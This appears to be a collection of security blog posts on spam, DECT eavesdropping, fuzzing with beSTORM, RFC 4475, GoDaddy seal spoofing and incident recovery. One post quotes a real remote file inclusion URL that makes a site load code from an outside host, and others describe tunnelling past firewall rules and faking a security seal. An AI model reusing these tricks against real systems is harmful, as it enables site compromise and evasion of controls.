I received this email today:

Good morning!

I inform you about site http://carder.su where people trade in stolen credit cards. As i’m a holder of visa classic i’m sincerely
exasperated at appearing such sites in your hosting. I beg of you to take strong measures and don’t be indifferent to heart-break of other people. This complaint will be sent to the FBI.

Best regrads, Jon Shirov.

At first I was shocked, why would someone allow such a site to still be up even though someone reported it to the FBI. I had to do something.

Rushing to the rescue I looked at the site and it appears to be a pretty straight forward scam-sell site, you come there and buy stolen goods.

Why have I been notified only now I wondered… I looked back in my spam log and what do you know the same email appears more than once in my spam folder with different names, dates and of course email addresses

I am not sure what the scam/spam’s purpose is, apparently they want you to go to their site and see what they have to offer - you might be a potential customer to their operation.

I of course didn’t dig in to the site, nor am I interested in buying anything found there - on the other hand I will also not report this to the FBI as the site is not hosted inside the United States (It is hosted in Russia), nor is its domain under a US registrar (ends with a SU).

Whoever knows of a place to report such sites to please let me (us) know.

A short list of legitimate emails you will never get, if you have something else feel free to add:

* Lottery winnings - Microsoft is the big winner here, they keep sending me winning notifications, but I just don’t collect
* Your doctor’s prescription (probably some obscure medicine might go through, while most won’t) - to buy “cheap” fake medicine
* Your Antivirus renewal notice - trying to get you to install some form of malware
* Your bank’s security notice, and statement - of course its phishing scams
* Paypal payments being done to your name or from your name - phishing scams mainly
* Job offers - I get these money “mule” offers and get paid per call spam
Anything I missed?

What started off nicely in 1992 and promised the much needed privacy to cordless communication at home, has been brought into a halt a few days ago with the practical approach to eavesdropping on DECT communication.

DECT or Digital Enhanced Cordless Telecommunication is a widely used standard for cordless devices, mainly phones, but not limited to it, several POS or Point of Sale devices as well use the standard to communicate in a cheap and secure manner.

The DECT standard itself was not broken, but rather using a cheap off-the-shelf device that is able to receive (not yet transmit) DECT based data, the researchers have been able to prove that eavesdropping on the communication channel is possible.

Most interesting to me as a reader of the paper is that what stopped people from ‘breaking’ it till now, was the lack of hardware, or moreover the lack of cheap hardware, to experiment with, now with the availability (it has been around for a while) of COM-ON-AIR device and its character device (or raw software driver) things have been made a lot easier.

You can read more on this at deDECTed.org

Following up on my previous post on spam, it seems that spam has now gone another step and become not just unreadable - foreign language - but also unreadable to the un-computerized eye:

Subject: Please confirm your message

Body:

IURPQ1RZUEUgSFRNTCBQVUJMSUMgIi0vL1czQy8vRFREIEhUTUwgNC4wIFRyYW5zaX
Rpb25hbC8vRU4iPg0KPEhUTUw+PEhFQUQ+DQo8TUVUQSBodHRwLWVxdWl2PUNvbnRlb
nQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMiI+DQo8L0hF
QUQ+DQo8Qk9EWT48YSBocmVmPSJodHRwOi8vY291cnNlbWlnaHQuY29tLyIgdGFyZ2V0P
SjfYmxhbmsiPg0KPGltZyBzcmM9Imh0dHA6Ly9jb3Vyc2VtaWdodC5jb20vOGR2czkuanBnIiBib
3JkZXI9MCBhbHQ9IkhhdmluZyB0cm91YmxlIHZpZXdpbmcgdGhpcyBlbWFpbD8NCkNsaWNr
IGhlcmUgdG8gdmlldyBhcyBhIHdlYnBhZ2UuIj48L2E+PC9CT0RZPjwvSFRNTD57L0JBU0
U2NF9FTkNPREVEfQ0KDQoAAAAAAAAAAAAAAAA=

Wow that is nice, I would sure want to buy an IURPQ1…

This is plain silly it is a Base64 encoded message, but why would my reader open it?

There is indication in the email headers that this is Base64 encoded, but I can’t understand what kind of reader will even try to open it as it seems that base64 encode content inside a body is not common practice unless it is part of a multipart message.

Those wondering, the email’s intention is to show you an HTML  that sells you fake? real? pills.

Yes snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting that unlike other chat clients like Skype, MSN and others GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN which launches a separate window) allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing - basically never needing to logon/logoff on my PC/BlackBerry they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection

With the recent introduction of a native SCTP library into beSTORM you can easily fuzz your SCTP based protocols with beSTORM.

This includes all our existing protocols as well as SCTP dedicated protocols such as M3UA and MGCP.

SCTP for those that aren’t familiar with it is a fairly common protocol in the VoIP and Telecommunication industry it sits upon IP and ‘replaces’ the TCP/UDP layers. It has several benefits over TCP and UDP but it is mainly used because it has been endorsed by the SIGTRAN group as the primary way of communication between two telecommunication providers.

Many administrators blindly block anything that isn’t running on either port 80 (http), 443 (https) or 22 (ssh). Their claim is that nothing good can work any other port. This causes their uses to get frustrated when they want to use anything else that runs on any other port.
I am not talking about P2P or any other ‘evil’ programs which are pretty good at bypassing your restrictio on their own, Skype is one such example, I am talking about for example one of your engineers wanting to get techsupport but has his corporate VPN access blocked as most VPNs require at least a non-80, 443, 22 port to be open.

In such cases (as VPN), the techsupport guy will find a way around your restriction, perhaps using port 443 to tunnel the traffic through, even though its not really SSL going inside there . The smart administrator will use a Proxy or a Content Filtering agent to prevent such things, so a smart techsupport guy will tunnel everything via SSH, or even use HTTPS to tunnel the data (there are several solutions that do that).

My point is that, blindly blocking will give you the benefit for stopping the common user, but will frustrate a techsupport guy to to the point that he will find a way to bypass it. I suggest that you ‘give’ the techsupport guy a hand, understand what he needs, and give him that. Its better than him bypassing your restriction.

I am sure the readers have additional examples that can strengthen this point.

Yes, this should have brought tears into your eyes too Spam Volumes Drop by Two-Thirds After Firm Goes Offline, but luckily I cried too soon, I have seen spam amounts on the increase in the past 2 weeks. And unlike previous spam that my bogofilter and spamassassin were able to handle, this new spam is something that it can’t - or at least can’t yet.

I wonder what happened to make spam more ‘intelligent’, one thought that comes to my mind is that since now the massive botnet that was used to send spam is owned by someone else, the spam now looks different - something else generates it, while the same network sends it out.

I hope the catch the guy whose keeping this network alive, and take it down once more, we deserve the relief from spam for a few days at least

On a side note, I have seen an increase on foreign spam, natively written Russian, Chinese , and Japanese spam - this is even more silly than regular English written spam, as I can’t even start to wonder what they are trying to sell me

Even to right spam you apparently need:

1) A spell checker

2) Understand what the words mean

This is the spam email I received, why would someone even want to answer it?

Hello,
I am Ming Yang,i have an obscured busines suggestion for you.please
Contact me for further details on ( [removed]@yahoo.com.hk )

Kind Regards
Ming Yang
Mail: [removed]@yahoo.com.hk

I recently received an email from a co-worker which upon clicking on it (to preview it) my email reader crashed.

The crash was so weird, that I had to try it again I reopened the email reader and clicked on the email again, of course it crashed once more.

I investigated a bit further on the matter, and I noticed that the email contained a TNEF file which my email reader tried to automatically parse, and apparently failed due to a bad memcpy directive (copying more than you have allocated space for).

Once I zero in on what is triggering it, I will report it to the vendor.

I recently received a spam email that wants me to buy solar lamps for the garden, my first impulse of course was to delete it. But I had to admit, I wanted those solar lamps, they looked nice, and the price was ok.

I have no idea what to do now, on the one hand this was sent as part of a spam campain, buying it might prove to be:

1) Fraudulent - pay get nothing (best chances)
2) A scam - pay get nothing worth your money (moderate chances)
3) A legitimate deal - pay and get what I paid for (slim chances)
In addition of course to the fact that if I buy it, I am proving the spammer’s agenda, that someone wants their merchandise and this is their only way to reach him.

What do you guys suggest I do?

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)

When beSTORM is used to test VoIP products, it’s usually the standard SIP, SDP and RTP fuzzing. But we were recently asked about opinion on RFC 4475, which was an interesting case study. RFC 4475 for those who do not know is an IETF standard whose goal is to give[s] examples of Session Initiation Protocol (SIP) test messages designed to exercise and “torture” a SIP implementation. This is great but as the RFC states, these are just a few examples - to be more specific 49 discrete examples.

These 49 examples claim to check a broad range of problems that a SIP parser may come across, and that it should either ignore, reject it or handle it correctly.These examples try to test more than one malformed, incorrect or problematic field at a time - opening the possibility that one problematic field is preventing others from being processed.

My problem with these 49 cases is that they seem to be very tailored, testing for specific stuff, without testing all the possible variables of that same example. Lets take the Content-Length header. One example checks the resilience to a negative value, another to a large positive, another yet to the value of zero (0).Did you notice what is missing, for example where is the off-by one underflows/overflows?

Another example is the use of IP addresses inside the sample data, a carelessness or a small oversight by the tester might make the whole example invalid and not parser-able by the test subject. It might be discarded by the product making the entire test worthless, but the tester happy for ‘passing’ the test. It’s like passing a final exam by not showing up!
In conclusion, running those 49 examples is not straight forward, in addition once you ran them and passed, can you say you are ok? From experience I can tell you that in many cases, both our customers and open source products we have tested with beSTORM failed the complete fuzzing test while they passed the RFC 4475 - beSTORM simply discovered one or more vulnerabilities in them that simply didn’t fit any of the 49 examples provided inside the RFC 4475 torture examples.

My recommendation? Testing for those 49 examples only tells you that you are compliant with RFC 4475. Only a serious fuzzer will tell you if your product is secure against SIP, SDP or RTP based attacks.

GoDaddy has decided to start giving away security seals to web sites. What is this security seal about? Well, it doesn’t say much beside telling you that GoDaddy verified something - what did they verify? It doesn’t say.

How does it work?

You are supposed to put a script tag inside your site, with the source reference of https://seal.godaddy.com/getSeal?sealID=[removed]

This generates HTML code that contains references to:

https://seal.godaddy.com:443/flash/sitesealgd_t_medium.swf?domainName=www.putyournamehere.com&color=000000

Changing the www.putyournamehere.com to www.re-electbush.com, www.mcainwon.com or even obamaisournewleader.com will show that you have been verified by GoDaddy - yeah!

Try it out yourself and see how you can get a godaddy seal with no effort - joy to the world

I have been trying to contact the guys at SCO to report a serious vulnerability in their operating system as part of our SSD program, with very little success:

All the emails I send there return with this funny bounce message:

security -alert@sco.com
Sorry. Although I’m listed as a best-preference MX or A for that host, it isn’t in my control/locals file, so I don’t treat it as local. (#5.4.6)

A few other emails I sent to people I used to know there, bounced with the same message.

If anyone from SCO reads this post, or you know someone that can help me reach those guys, I would be grateful if you can contact me.

There is always a lot of talk about disaster recovery being important against, flood, weather, power failures, etc. But very little talk on disaster recovery due to security events.

When a security event happens, it is a disaster. It can mean downtime to your web site, or that your records were deleted or modified, and sometimes the biggest disaster is the bad PR day.

Typical disaster plans talk about a short failover time, but neglect to take into account what happens if one server was compromised. In this case, how will the short failover time affect it - will the corrupt or modified data propagate to the failover server causing two failed sites instead of one?

With recent break-ins reaching the news, where extremist groups hacking into any site they can gain access to, I see too often the web site show a banner, just after the break in, saying that it will be back in a few days. I’m left wondering if when they’re back, will they still suffer from the same security hole (most likely an SQL injection) that allowed the attackers in the first place? What about hidden malware - was the server reinstalled from scratch? And what backup was used to restore - the one with the attacker’s backdoor? I think we all know the answers…